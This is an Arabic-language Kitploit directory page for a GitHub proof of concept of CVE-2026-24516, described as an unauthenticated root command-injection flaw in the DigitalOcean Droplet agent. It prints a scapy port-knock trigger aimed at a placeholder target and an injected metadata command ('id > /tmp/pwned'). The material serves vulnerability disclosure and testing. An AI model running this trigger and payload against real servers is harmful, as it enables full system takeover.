Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-24516-DigitalOcean-RCE — نقطة ضعف حرجة في RCE قبل المصادقة (CVSS 10.0) في وكيل DigitalOcean Droplet حتى الإصدار v1.3.2 عبر حقن الأوامر. | Kitploit
أدوات/GitHubGitHub/poxsky/cve-2026-24516-digitalocean-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubpoxsky/cve-2026-24516-digitalocean-rce

CVE-2026-24516-DigitalOcean-RCE

نقطة ضعف حرجة في RCE قبل المصادقة (CVSS 10.0) في وكيل DigitalOcean Droplet حتى الإصدار v1.3.2 عبر حقن الأوامر.

عرض المستودع
1منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-24516-DigitalOcean-RCE

ثغرة RCE حرجة بدون مصادقة (CVSS 10.0) في وكيل DigitalOcean Droplet حتى الإصدار v1.3.2 عبر حقن الأوامر.

CVE-2026-24516: ثغرة RCE بدون مصادقة بصلاحيات الجذر في وكيل DigitalOcean Droplet

نظرة عامة

تم اكتشاف ثغرة حرجة في حقن الأوامر في وكيل DigitalOcean Droplet (جميع الإصدارات حتى 1.3.2). تسمح هذه الثغرة للمهاجم بتحقيق تنفيذ الأوامر عن بُعد (RCE) بصلاحيات الجذر دون أي مصادقة.

مكتشف الثغرة: Anmol Singh Rajput (@pox_sky_01) - Cortex Security Research

التفاصيل الفنية

توجد الثغرة في مكوّن معالجة استكشاف الأخطاء وإصلاحها:

  • internal/troubleshooting/actioner/actioner.go
  • internal/troubleshooting/command/exec.go

يقوم الوكيل بمعالجة البيانات الوصفية من الخدمة المحلية (169.254.169.254) وينفذ الأوامر من مصفوفة دون تنقية مناسبة.

TroubleshootingAgent.Requesting

المشغّل (قرع المنافذ)

يتم تشغيل الوكيل عبر حزمة TCP محددة إلى المنفذ 22:

  • SeqNum: 68796879
  • AckNum: 848489

إثبات المفهوم (PoC)

  1. تشغيل الجلب: python3 -c "from scapy.all import *; send(IP(dst='TARGET')/TCP(dport=22,flags='S',seq=68796879,ack=848489))"

  2. حمولة البيانات الوصفية الخبيثة:

    root@kitploit:~
    {
      "troubleshooting_agent": {
        "requesting": ["command:id > /tmp/pwned"]
      }
    }
    

الأثر درجة CVSS: 10.0 (حرجة)

الصلاحيات المطلوبة: لا شيء

النتيجة: اختراق كامل للنظام (وصول الجذر)

photo_1_2026-03-22_13-46-01 photo_12_2026-03-22_13-46-01 photo_3_2026-03-22_13-46-01 photo_4_2026-03-22_13-46-01 photo_5_2026-03-22_13-46-01 photo_6_2026-03-22_13-46-01

تنزيل الأداة